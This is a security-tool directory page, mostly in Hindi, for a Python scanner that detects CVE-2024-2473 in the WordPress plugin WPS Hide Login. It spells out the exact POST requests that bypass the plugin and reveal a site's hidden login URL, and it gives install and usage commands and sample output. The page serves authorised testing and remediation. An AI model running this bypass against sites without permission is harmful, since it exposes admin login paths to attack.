Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-2473 — Wordpress Hidden Login Page Disclosure. Detect Login Page Disclosure in WordPress sites running WPS Hide Login ≤ 1.9.15.2 (CVE-2024-2473) | Kitploit
उपकरण/GitHubGitHub/m4xsec/cve-2024-2473
ReconnaissanceVulnerability ScannersExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubm4xsec/cve-2024-2473

CVE-2024-2473

Wordpress Hidden Login Page Disclosure. Detect Login Page Disclosure in WordPress sites running WPS Hide Login ≤ 1.9.15.2 (CVE-2024-2473)

रिपॉजिटरी देखें
215 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-2473 — WPS Hide Login पृष्ठ पहचानकर्ता

वर्डप्रेस साइटों पर WPS Hide Login ≤ 1.9.15.2 चला रहे लॉगिन पृष्ठ प्रकटीकरण का पता लगाने के लिए एक पेशेवर Python स्कैनर

Python CVE CVSS License Platform

Venexy द्वारा कोडित


विषय-सूची

  • अवलोकन
  • भेद्यता विवरण
  • यह कैसे काम करता है
  • आवश्यकताएँ
  • स्थापना
  • उपयोग
  • आउटपुट उदाहरण
  • अस्वीकरण
  • संदर्भ

अवलोकन

WPS Hide Login एक लोकप्रिय WordPress प्लगइन है जो प्रशासकों को डिफ़ॉल्ट /wp-login.php URL को एक कस्टम, छिपे हुए पथ में बदलने की अनुमति देता है — जो अस्पष्टता के माध्यम से सुरक्षा के रूप में कार्य करता है।

यह स्कैनर CVE-2024-2473 का पता लगाता है, एक भेद्यता जहाँ action=postpass पैरामीटर प्रदान करके प्लगइन के सुरक्षा तंत्र को पूरी तरह से बायपास किया जा सकता है, जिससे छिपा हुआ लॉगिन पृष्ठ URL अप्रमाणित हमलावरों को उजागर हो जाता है।


भेद्यता विवरण

विवरण

WPS Hide Login प्लगइन वर्डप्रेस लॉगिन पृष्ठ को डिफ़ॉल्ट /wp-login.php से प्रशासक द्वारा चुने गए कस्टम URL पर स्थानांतरित करता है। हालांकि, 1.9.15.2 तक के सभी संस्करणों में, /wp-login.php या /wp-admin/ को action=postpass क्वेरी पैरामीटर प्रदान करने से यह सुरक्षा बायपास हो जाती है, जिससे छिपे हुए लॉगिन फॉर्म का वास्तविक क्रिया URL प्रकट होता है — प्रभावी रूप से किसी भी अप्रमाणित हमलावर को गुप्त लॉगिन पथ उजागर होता है।


यह कैसे काम करता है

स्कैनर भेद्यता के आक्रमण प्रवाह को तीन चरणों में दोहराता है:

root@kitploit:~
Phase 1  ─►  पुष्टि करें कि लक्ष्य एक WordPress स्थापना है
                  │
                  ▼
Phase 2a ─►  POST /wp-login.php?action=postpass
             बॉडी के साथ: action=lostpassword&post_password=test
             जाँच: HTTP 200 + lostpasswordform मौजूद + बॉडी में कोई wp-login.php नहीं
             फॉर्म क्रिया विशेषता से छिपा लॉगिन URL निकालें
                  │
Phase 2b ─►  POST /wp-admin/?action=postpass
             जाँच: HTTP 302 पुनर्निर्देशन जिसमें reauth=1 या /login शामिल हो
                  │
                  ▼
             खोजे जाने पर छिपा लॉगिन URL रिपोर्ट करें

यदि या तो Phase 2a या Phase 2b मेल खाता है, तो लक्ष्य को असुरक्षित के रूप में चिह्नित किया जाता है।


आवश्यकताएँ

  • Python 3.7 या उच्चतर
  • requests लाइब्रेरी

स्थापना

1. रिपॉजिटरी को क्लोन करें

root@kitploit:~
git clone https://github.com/m4xsec/CVE-2024-2473.git
cd CVE-2024-2473

2. निर्भरताएँ स्थापित करें

root@kitploit:~
pip install requests

नोट: Python वर्चुअल वातावरण या Kali Linux का उपयोग करने वाले सिस्टम पर, आपको आवश्यकता हो सकती है:

root@kitploit:~
pip install requests --break-system-packages

उपयोग

root@kitploit:~
python CVE-2024-2473.py -u <TARGET_URL> [-t TIMEOUT]

तर्क

तर्कविवरणडिफ़ॉल्ट
-u, --urlलक्ष्य WordPress आधार URL

उदाहरण

root@kitploit:~
# मूल स्कैन
python CVE-2024-2473.py -u https://example.com

# कस्टम टाइमआउट के साथ स्कैन
python CVE-2024-2473.py -u https://example.com --timeout 15

# HTTP पर स्कैन
python CVE-2024-2473.py -u http://192.168.1.100

आउटपुट उदाहरण

root@kitploit:~

  ┌─────────────────────────────────────────────────────────────┐
  │  CVE-2024-2473  •  WPS Hide Login Page Identifier           │
  │  Coded by Venexy | https://github.com/m4xsec               │
  └─────────────────────────────────────────────────────────────┘

  ===============================================================
    TARGET    https://example.com
    TIME      2024-11-01 18:00:00
    TIMEOUT   10s
  ===============================================================

  [18:00:00] [*] Phase 1 | Fingerprinting WordPress installation ...
  [18:00:01] [+] WordPress confirmed — https://example.com

  [18:00:01] [*] Phase 2 | Testing CVE-2024-2473 bypass vectors ...

  [18:00:01] [*] Vector A | POST /wp-login.php?action=postpass
             +- Status : 200   Result : MATCH

  [18:00:02] [*] Vector B | POST /wp-admin/?action=postpass
             +- Status : 302   Result : MATCH

  ###############################################################
  ##           VULNERABILITY CONFIRMED  --  CVE-2024-2473      ##
  ###############################################################

    Plugin          WPS Hide Login <= 1.9.15.2
    Severity        Medium (CVSS 5.3 / EPSS 93rd percentile)
    CWE             CWE-200 — Exposure of Sensitive Information
    CVSS Vector     AV:N / AC:L / PR:N / UI:N / S:U / C:L / I:N / A:N

  [18:00:02] [VULN] Bypass confirmed via /wp-login.php?action=postpass

  ====================================================
        HIDDEN LOGIN URL DISCOVERED
  ====================================================

  >>  https://example.com/my-secret-admin-path/

  ====================================================

अस्वीकरण

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है।

लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए उत्तरदायी नहीं है। किसी भी सुरक्षा मूल्यांकन से पहले हमेशा लक्ष्य सिस्टम स्वामी से स्पष्ट लिखित अनुमति प्राप्त करें। अनधिकृत स्कैनिंग या प्रणालियों का शोषण अवैध और अनैतिक है।

जिम्मेदारी से उपयोग करें।


संदर्भ


Venexy द्वारा ❤️ से कोडित

यदि यह उपकरण आपकी मदद करता है, तो रिपॉजिटरी को ⭐🌟🌟🌟 देने पर विचार करें।

टूल डाउनलोड करें
फ़ील्डविवरण
CVE IDCVE-2024-2473
प्रभावितWPS Hide Login प्लगइन ≤ 1.9.15.2 for WordPress
गंभीरतामध्यम
CVSS स्कोर5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
CWECWE-200 — संवेदनशील जानकारी का प्रकटीकरण
EPSS स्कोर0.10433 (93वाँ प्रतिशतक)
प्रमाणीकरण आवश्यककोई नहीं
विक्रेताWPServeur
उपायप्लगइन को संस्करण > 1.9.15.2 में अपडेट करें
(आवश्यक)
—
-t, --timeoutसेकंड में HTTP अनुरोध टाइमआउट10
संसाधनलिंक
NVD — CVE-2024-2473https://nvd.nist.gov/vuln/detail/CVE-2024-2473
Wordfence सलाहhttps://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wps-hide-login/wps-hide-login-19152-login-page-disclosure
WPS Hide Login प्लगइनhttps://wordpress.org/plugins/wps-hide-login/
CWE-200https://cwe.mitre.org/data/definitions/200.html
CVSS 3.1 कैलकुलेटरhttps://www.first.org/cvss/calculator/3.1